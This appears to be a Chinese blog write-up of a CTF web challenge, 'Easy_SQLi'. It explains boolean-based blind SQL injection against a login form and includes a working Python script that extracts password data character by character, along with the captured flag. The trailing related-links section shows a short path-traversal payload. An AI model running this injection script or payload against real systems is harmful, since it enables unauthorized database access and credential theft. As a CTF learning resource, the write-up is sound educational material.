2024青少年ctf擂台挑战赛round1-Easy_SQLi

最新推荐文章于 2024-05-30 14:52:09 发布
最新推荐文章于 2024-05-30 14:52:09 发布
阅读量535 收藏 1
点赞数 2
文章标签: 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71656576/article/details/136388551
版权

登录界面,随便输个1,1

发现没有回显数据,只有这种报错相关的提示

在这里插入图片描述

不管三七二十一,开始爆破

有惊喜

在这里插入图片描述

接下来可以开始注入了,这个跟最简单的sql注入不一样,没有数据回显,我就用我比较熟悉的布尔盲注开始爆破了

可以直接开始爆破列,手工爆破就用二分法

我爆破出来了有三个列,id,username,password

猜测flag是在password里

不要在意端口,补wp的时候容器到时了,重新开了一个

在这里插入图片描述

写了个py的脚本爆破password的数据

import requests
import time
url = "http://challenge.qsnctf.com:30162/login.php"
flag = ""
for num in range(1,100):
    for i in range(33,127) :
        data = {'uname':"' or 1=1 and  ascii(substr((select group_concat(password) from information_schema.columns where table_schema=database()),{0},1))={1}#".format(num,i),'psw':'1'}
        res = requests.post(url = url, data = data)
        time.sleep(0.05)
        if res.text == "Login successful" :
            flag += chr(i)
            break
print(flag)

flag出来了

qsnctf{4b2b33f44897437eb4d0bc1b1328a0e5}

在这里插入图片描述

Naby1
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
青少年CTF-A1-Misc-MC大挑战01
m0_74866126的博客
11-17 325
在网上冲浪没找到这题的答案,无奈只有自己试试了,花了很多的时间对压缩包解压的文件进行搜索flag痕迹,但是没有有用的线索,所以做这个可不是直接能从出题人给的文件里找到flag。
[SWPUCTF 2024 新生赛]easy_sql SQL(1)
m0_74918915的博客
04-12 950
知识点,真正体系化!**
【Web】青少年CTF擂台挑战赛 2024 #Round 1 wp
uuzeray的博客
03-01 2420
好家伙,比赛结束了还有一道0解web题是吧(随缘写点wp(简单过头,看个乐就好)
青少年CTF擂台挑战赛 2024 #Round 1
weixin_70928309的博客
04-16 678
最后发现这么一堆,好样的,上网搜了一下,emmm,eval钩子,直接eval换成echo就可,然后解出来是这么个反序列化呜呜呜,又是反序列化。Vs加python跑傻了,两台kali都跑错了,哎,蚌埠住了,跑了一个小时。这,不是,我为什么回到了一年之前做题,一个时间盲注脚本即可跑出来。题目显示xxe漏洞,还给了版本号,直接搜一下,啊,公开wp?看出来后面三个是iife,根据我所知道的英文,直接猜life。解出情况中写了题目名称后面真的不想写了,累死了,第一层,我直接010打开,然后熟悉的base系列。
青少年CTF擂台挑战赛 2024 #Round 1 PK You!战队 WriteUp
2301_79744960的博客
03-02 1784
青少年CTF擂台挑战赛 2024 #Round 1 PK You!战队 WriteUp
青少年CTF擂台挑战赛2024round#1 web与杂项部分题解
2301_76968724的博客
03-02 1749
这次的青少年CTF擂台挑战赛,相较于去年,我觉得,今年的web题很适合刚入门的初学者进行攻克,难度属于中等对于初学者来讲,还是需要了解一些web方面稍微深层的知识,并且做题还是需要一些脑洞。话不多说咱们开始。
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP
Jay17的博客
03-02 1389
青少年CTF擂台挑战赛 2024 #Round 1 Web方向题解 WP
青少年ctf擂台挑战赛 2024 #round 1
04-16
青少年ctf擂台挑战赛 2024 #round 1
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
KWA_Write-UP-CTF_Muhammad-Irsyad-Ali_05311840000041
03-18
Dokumentasi CTF-穆罕默德·伊尔萨德·阿里(Muhammad Irsyad Ali) 问题清单 UTCTF 2021 初学者 完整性检查1.说明您可以在#announcements频道的说明中找到该标志! 2.标志utflag {welcome_to_utctf}![替代文字]...
京麒CTF2024-Re-easy-wasm(wasm逆向分析)
05-26
京麒CTF2024-Re-easy-wasm(wasm逆向分析)
青少年CTF-qsnctf-Web-Queen
m0_73734159的博客
12-20 585
注意是加X-Forwarded-For请求头的那个数据包。看到了登录窗口,使用burp suite工具进行抓包。这里我创建了一个名为flag.txt的文本文件。将抓包数据内容复制下来放到一个文本文件当中。根据做题经验不难看出是base64编码。题目描述:Q的系统会不会有漏洞?您的IP不是管理员的IP地址!之前可以用sqlmap跑出来。使用sqlmap工具梭一把。并将数据包内容粘贴到了其中。猜测此题目涉及SQL注入。输入的账号和密码被加密。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8262
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基础—SQL—DQL(数据查询语言)聚合函数
最新发布
m0_74363339的博客
05-30 492
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
Java事务入门:从基础概念到初步实践
Huazie
05-29 1052
本文 Huazie 从 Java 事物的基础概念出发,带大家通过不同的事物管理方式进行实践,进一步加深了对 Java 事物的理解。
postgressql——Tuple学习(2)
Re_view的博客
05-27 355
postgressql——Tuple学习(2)
PostgreSQL发展史
PGCCC的博客
05-28 1025
PostgreSQL 的发展史反映了其从学术研究项目到全球领先的开源数据库系统的演变过程。通过不断的创新和社区支持,PostgreSQL 已经成为一个功能强大、性能优越的数据库管理系统,广泛应用于各个行业的关键业务场景中。#postgresql培训。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值